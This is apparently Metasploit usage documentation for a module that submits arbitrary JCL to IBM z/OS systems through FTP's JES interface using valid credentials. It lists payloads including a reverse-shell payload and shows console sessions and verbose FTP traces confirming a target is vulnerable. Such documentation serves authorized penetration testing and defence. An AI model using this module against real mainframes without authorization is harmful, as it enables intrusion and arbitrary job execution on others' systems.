109 lines
3.7 KiB
Markdown
109 lines
3.7 KiB
Markdown
|
z/OS JCL authorized FTP-base command execution - hints & tips
|
||
|
|
||
|
In order to use this exploit, you must have valid credentials on the target z/OS system. The credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit.
|
||
|
|
||
|
## Vulnerable Application
|
||
|
|
||
|
This exploit was tested on the ftp daemons for z/OS version 1.13 / 2.1
|
||
|
|
||
|
## Payloads
|
||
|
|
||
|
If the exploit works, any JCL the user has rights to submit can be submitted.
|
||
|
|
||
|
See cmd type payloads under mainframe with jcl in the payload name, e.g.:
|
||
|
|
||
|
```
|
||
|
msf exploit(ftp_jcl_creds) > show payloads
|
||
|
|
||
|
Compatible Payloads
|
||
|
===================
|
||
|
|
||
|
Name Disclosure Date Rank Description
|
||
|
---- --------------- ---- -----------
|
||
|
cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits
|
||
|
cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP
|
||
|
```
|
||
|
|
||
|
## Verification Steps
|
||
|
|
||
|
A successful check of the exploit will look like this:
|
||
|
|
||
|
```
|
||
|
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
|
||
|
FTPUSER => ftptest
|
||
|
msf exploit(ftp_jcl_creds) > set FTPPASS password
|
||
|
FTPPASS => password
|
||
|
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
|
||
|
RHOST => 10.10.10.1
|
||
|
msf exploit(ftp_jcl_creds) > info
|
||
|
|
||
|
Name: FTP JCL Execution
|
||
|
Module: exploit/mainframe/ftp/ftp_jcl_creds
|
||
|
Platform: Mainframe
|
||
|
Privileged: No
|
||
|
License: Metasploit Framework License (BSD)
|
||
|
Rank: Normal
|
||
|
Disclosed: 2013-05-12
|
||
|
|
||
|
Available targets:
|
||
|
Id Name
|
||
|
-- ----
|
||
|
0 auto
|
||
|
|
||
|
Basic options:
|
||
|
Name Current Setting Required Description
|
||
|
---- --------------- -------- -----------
|
||
|
FTPPASS password no The password for the specified username
|
||
|
FTPUSER ftptest no The username to authenticate as
|
||
|
RHOST 10.10.10.1 yes The target address
|
||
|
RPORT 21 yes The target port
|
||
|
SLEEP 5 no Time to wait before checking if job has completed.
|
||
|
|
||
|
Payload information:
|
||
|
|
||
|
Description:
|
||
|
Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
|
||
|
valid credentials on the target system
|
||
|
|
||
|
msf exploit(ftp_jcl_creds) > check
|
||
|
|
||
|
[+] 10.10.10.1:21 - Successfully connected to FTP server.
|
||
|
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
|
||
|
[+] The target is vulnerable.
|
||
|
msf exploit(ftp_jcl_creds) >
|
||
|
```
|
||
|
|
||
|
|
||
|
## Debugging
|
||
|
|
||
|
If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run.
|
||
|
The output should look similar to the below, on a vulnerable system.
|
||
|
|
||
|
```
|
||
|
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
|
||
|
FTPDEBUG => true
|
||
|
msf exploit(ftp_jcl_creds) > set VERBOSE true
|
||
|
VERBOSE => true
|
||
|
msf exploit(ftp_jcl_creds) > check
|
||
|
|
||
|
[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
|
||
|
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
|
||
|
[*] 10.10.10.1:21 - Connected to target FTP server.
|
||
|
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
|
||
|
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
|
||
|
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
|
||
|
[*] 10.10.10.1:21 - Sending password...
|
||
|
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
|
||
|
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n"
|
||
|
[+] 10.10.10.1:21 - Successfully connected to FTP server.
|
||
|
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
|
||
|
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
|
||
|
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
|
||
|
[+] The target is vulnerable.
|
||
|
msf exploit(ftp_jcl_creds) >
|
||
|
```
|
||
|
|
||
|
## Notes
|
||
|
|
||
|
The job run will leave a joblog for the credentials used.
|